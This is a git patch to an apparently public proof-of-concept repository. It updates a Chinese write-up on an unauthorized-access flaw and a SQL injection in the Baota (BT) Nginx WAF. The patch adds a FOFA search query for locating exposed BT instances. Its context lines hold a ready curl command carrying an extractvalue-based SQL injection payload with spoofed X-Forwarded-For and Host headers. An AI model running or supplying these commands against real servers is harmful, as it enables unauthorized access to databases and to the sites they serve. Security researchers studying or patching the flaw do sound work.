From e310ff5e4255b3717111754a358aa0443a572dc8 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 2 Apr 2024 14:21:26 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E5=AE=9D=E5=A1=94=E6=9C=80=E6=96=B0?= =?UTF-8?q?=E6=9C=AA=E6=8E=88=E6=9D=83=E8=AE=BF=E9=97=AE=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E5=8F=8Asql=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 宝塔最新未授权访问漏洞及sql注入.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/宝塔最新未授权访问漏洞及sql注入.md b/宝塔最新未授权访问漏洞及sql注入.md
index 754dcd3..c6e9aef 100644
--- a/宝塔最新未授权访问漏洞及sql注入.md
+++ b/宝塔最新未授权访问漏洞及sql注入.md
@@ -2,6 +2,13 @@
 WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞和未授权漏洞
+## fofa
+```
+title=='404 - Website not exist!'
+
+"宝塔"
+```
+
 ## 未授权
 漏洞代码
@@ -53,9 +60,12 @@ curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn' -H 'X-Forwarde
 ```
 ## sql注入
+
 ```
 curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'
 ```
+![image](https://github.com/wy876/POC/assets/139549762/bbd89fb6-b9b7-4628-a33d-57fc7b8708e5)
+
 ## 漏洞来源
 - https://mp.weixin.qq.com/s/7AqKcCS9puZgb9lG2KcAsg